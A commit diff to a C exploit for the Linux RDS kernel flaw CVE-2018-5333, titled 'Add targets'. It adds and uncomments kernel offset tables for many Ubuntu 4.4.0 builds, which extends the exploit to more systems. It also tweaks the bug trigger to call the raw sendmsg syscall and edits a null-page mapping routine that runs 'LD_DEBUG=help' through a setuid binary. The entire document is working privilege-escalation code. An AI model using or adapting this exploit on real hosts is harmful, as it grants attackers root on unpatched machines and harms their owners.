[CVE-2018-5333] Add targets

Author: bcoles

CVE-2018-5333/cve-2018-5333.c

@@ -148,15 +148,10 @@ struct kernel_info kernels[] = {
   { "4.4.0-24-generic #43-Ubuntu",   0xa2340, 0xa2730, 0x5d0c5, 0x178447, 0x3f98b8, 0x64644, 0x7d125  },
   { "4.4.0-28-generic #47-Ubuntu",   0xa24a0, 0xa2890, 0x5d0c5, 0x178717, 0x3f9f38, 0x64644, 0x585dc  },
   { "4.4.0-31-generic #50-Ubuntu",   0xa24a0, 0xa2890, 0x5d0c5, 0x1787a7, 0x3ffed8, 0x64644, 0x7d125  },
+  { "4.4.0-34-generic #53-Ubuntu",   0xa24a0, 0xa2890, 0x5d0c5, 0x1787a7, 0x3fff48, 0x64644, 0x7d125  },
+  { "4.4.0-36-generic #55-Ubuntu",   0xa24a0, 0xa2890, 0x5d0c5, 0x1787c7, 0x400148, 0x64634, 0x7d115 },
   { "4.4.0-38-generic #57-Ubuntu",   0xa2570, 0xa2960, 0x5d0c5, 0x178a97, 0x400968, 0x64634, 0x7d1e5  },
   { "4.4.0-42-generic #62-Ubuntu",   0xa25c0, 0xa29b0, 0x5d0c5, 0x178ac7, 0x400d78, 0x64634, 0x7d1a5  },
-  { "4.4.0-98-generic #121-Ubuntu",  0xa2850, 0xa2c40, 0x5d0c5, 0x17a427, 0x40a138, 0x64694, 0x4b243  },
-  { "4.4.0-108-generic #131-Ubuntu", 0xa3420, 0xa3810, 0x5d0c5, 0x17af37, 0x40aa98, 0x646a4, 0x7dd35  },
-  { "4.4.0-109-generic #132-Ubuntu", 0xa3420, 0xa3810, 0x5d0c5, 0x17af37, 0x40aa98, 0x646a4, 0x7dd35  },
-  { "4.4.0-112-generic #135-Ubuntu", 0xa3a90, 0xa3e80, 0x5d0c5, 0x17b657, 0x40b238, 0x646a4, 0x54137c },
-  { "4.4.0-116-generic #140-Ubuntu", 0xa4cf0, 0xa50e0, 0x5e0c5, 0x17d5d7, 0x40ed08, 0x65734, 0x3a5b04 },
-
-  /* Untested:
   { "4.4.0-51-generic #72-Ubuntu",   0xa2670, 0xa2a60, 0x5d0c5, 0x178cf7, 0x404d78, 0x64634, 0x7d1a5  },
   { "4.4.0-62-generic #83-Ubuntu",   0xa2840, 0xa2c30, 0x5d0c5, 0x179747, 0x406a78, 0x64634, 0x7d1e5  },
   { "4.4.0-63-generic #84-Ubuntu",   0xa2840, 0xa2c30, 0x5d0c5, 0x179827, 0x406e98, 0x64634, 0x406eb  },
@@ -167,7 +162,11 @@ struct kernel_info kernels[] = {
   { "4.4.0-89-generic #112-Ubuntu",  0xa28a0, 0xa2c90, 0x5d0c5, 0x179d27, 0x408ae8, 0x64694, 0x7d265  },
   { "4.4.0-96-generic #119-Ubuntu",  0xa28c0, 0xa2cb0, 0x5d0c5, 0x179e27, 0x409a48, 0x64694, 0x7d235  },
   { "4.4.0-97-generic #120-Ubuntu",  0xa2850, 0xa2c40, 0x5d0c5, 0x179e47, 0x409a58, 0x64694, 0x4ed41  },
-  */
+  { "4.4.0-98-generic #121-Ubuntu",  0xa2850, 0xa2c40, 0x5d0c5, 0x17a427, 0x40a138, 0x64694, 0x4b243  },
+  { "4.4.0-108-generic #131-Ubuntu", 0xa3420, 0xa3810, 0x5d0c5, 0x17af37, 0x40aa98, 0x646a4, 0x7dd35  },
+  { "4.4.0-109-generic #132-Ubuntu", 0xa3420, 0xa3810, 0x5d0c5, 0x17af37, 0x40aa98, 0x646a4, 0x7dd35  },
+  { "4.4.0-112-generic #135-Ubuntu", 0xa3a90, 0xa3e80, 0x5d0c5, 0x17b657, 0x40b238, 0x646a4, 0x54137c },
+  { "4.4.0-116-generic #140-Ubuntu", 0xa4cf0, 0xa50e0, 0x5e0c5, 0x17d5d7, 0x40ed08, 0x65734, 0x3a5b04 },
 
   { "4.4.0-21-lowlatency #37-Ubuntu",   0xa3150, 0xa3560, 0x5e0c5, 0x17b2c7, 0x401288, 0x64d34, 0x7d95c },
   { "4.4.0-22-lowlatency #40-Ubuntu",   0xa31c0, 0xa35d0, 0x5e0c5, 0x17b397, 0x401b48, 0x64d34, 0x7d9bc },
@@ -178,7 +177,14 @@ struct kernel_info kernels[] = {
   { "4.4.0-36-lowlatency #55-Ubuntu",   0xa3430, 0xa3840, 0x5e0c5, 0x17b9e7, 0x409318, 0x64d24, 0x7dacc },
   { "4.4.0-38-lowlatency #57-Ubuntu",   0xa3500, 0xa3910, 0x5e0c5, 0x17bcb7, 0x409b38, 0x64d24, 0x4c030 },
   { "4.4.0-42-lowlatency #62-Ubuntu",   0xa3560, 0xa3970, 0x5e0c5, 0x17bcf7, 0x409f68, 0x64d24, 0x7db6c },
+  { "4.4.0-70-lowlatency #91-Ubuntu",   0xa3780, 0xa3b90, 0x5e0c5, 0x17cae7, 0x4104c8, 0x64d54, 0x24454 },
+  { "4.4.0-79-lowlatency #100-Ubuntu",  0xa37c0, 0xa3bd0, 0x5e0c5, 0x17cd17, 0x411588, 0x64d54, 0x24454 },
+  { "4.4.0-87-lowlatency #110-Ubuntu",  0xa38c0, 0xa3cd0, 0x5e0c5, 0x17cfd7, 0x411ad8, 0x64d74, 0x24454 },
+  { "4.4.0-89-lowlatency #112-Ubuntu",  0xa38e0, 0xa3cf0, 0x5e0c5, 0x17d037, 0x411e48, 0x64d74, 0x7dc0c },
+  { "4.4.0-96-lowlatency #119-Ubuntu",  0xa3910, 0xa3d20, 0x5e0c5, 0x17d137, 0x412d88, 0x64d84, 0x24454 },
+  { "4.4.0-97-lowlatency #120-Ubuntu",  0xa38c0, 0xa3cd0, 0x5e0c5, 0x17d157, 0x412d28, 0x64d84, 0x24454 },
   { "4.4.0-98-lowlatency #121-Ubuntu",  0xa38c0, 0xa3cd0, 0x5e0c5, 0x17d737, 0x413408, 0x64d84, 0x24454 },
+  { "4.4.0-108-lowlatency #131-Ubuntu", 0xa5530, 0xa5940, 0x5f0c5, 0x17f257, 0x414c18, 0x65d94, 0x7f7ac },
   { "4.4.0-109-lowlatency #132-Ubuntu", 0xa5530, 0xa5940, 0x5f0c5, 0x17f257, 0x414c18, 0x65d94, 0x7f7ac },
   { "4.4.0-112-lowlatency #135-Ubuntu", 0xa5bd0, 0xa5fe0, 0x5f0c5, 0x17f9a7, 0x415448, 0x65d94, 0x7f8dc },
   { "4.4.0-116-lowlatency #140-Ubuntu", 0xa6e00, 0xa7210, 0x600c5, 0x1818f7, 0x418a38, 0x66de4, 0x809ef },
@@ -216,6 +222,7 @@ struct kernel_info kernels[] = {
   //{ "4.8.0-58-lowlatency #63~16.04.1-Ubuntu", 0xa6ef0, 0xa7300, 0x5e0c5, 0x18aee7, 0x447568, 0x649f4, 0x7f932 },
 
   //{ "4.10.0-14-generic #16~16.04.1-Ubuntu", 0xab610, 0xaba00, 0x600c5, 0x194ac7, 0x458288, 0x67764, 0x34c4b },
+  //{ "4.10.0-19-generic #21~16.04.1-Ubuntu", 0xab620, 0xaba10, 0x600c5, 0x194b07, 0x4586a8, 0x67764, 0x34c4b },
   //{ "4.13.0-16-generic #19~16.04.3-Ubuntu", 0xa8220, 0xa85f0, 0x5f0c5, 0x19c8a7, 0x462d18, 0x668b4, 0x2f2d4 },
   //{ "4.13.0-37-generic #42~16.04.1-Ubuntu", 0xab1d0, 0xab5a0, 0x610c5, 0x1a0827, 0x46bf58, 0x68944, 0x3381b },
 };
@@ -275,13 +282,15 @@ void trigger_bug()
   msg.msg_controllen = RAND_SIZE;
   msg.msg_flags = MSG_DONTROUTE|MSG_PROXY|MSG_WAITALL;
 
-  sendmsg(fd, &msg, 0);
+  syscall(SYS_sendmsg, fd, &msg, 0);
 }
 
 // * * * * * * * * * * * * * * map null address * * * * * * * * * * * * *
 // https://bugs.chromium.org/p/project-zero/issues/detail?id=1792&desc=2
 
 void map_null() {
+  char *suid_path = "/bin/su";
+
   void *map = mmap((void *)0x10000, 0x1000, PROT_READ | PROT_WRITE,
     MAP_PRIVATE | MAP_ANONYMOUS | MAP_GROWSDOWN | MAP_FIXED, -1, 0);
 
@@ -307,7 +316,7 @@ void map_null() {
       exit(EXIT_FAILURE);
     }
     char cmd[1000];
-    sprintf(cmd, "LD_DEBUG=help su 1>&%d", fd);
+    sprintf(cmd, "LD_DEBUG=help %s 1>&%d", suid_path, fd);
     system(cmd);
   }
 }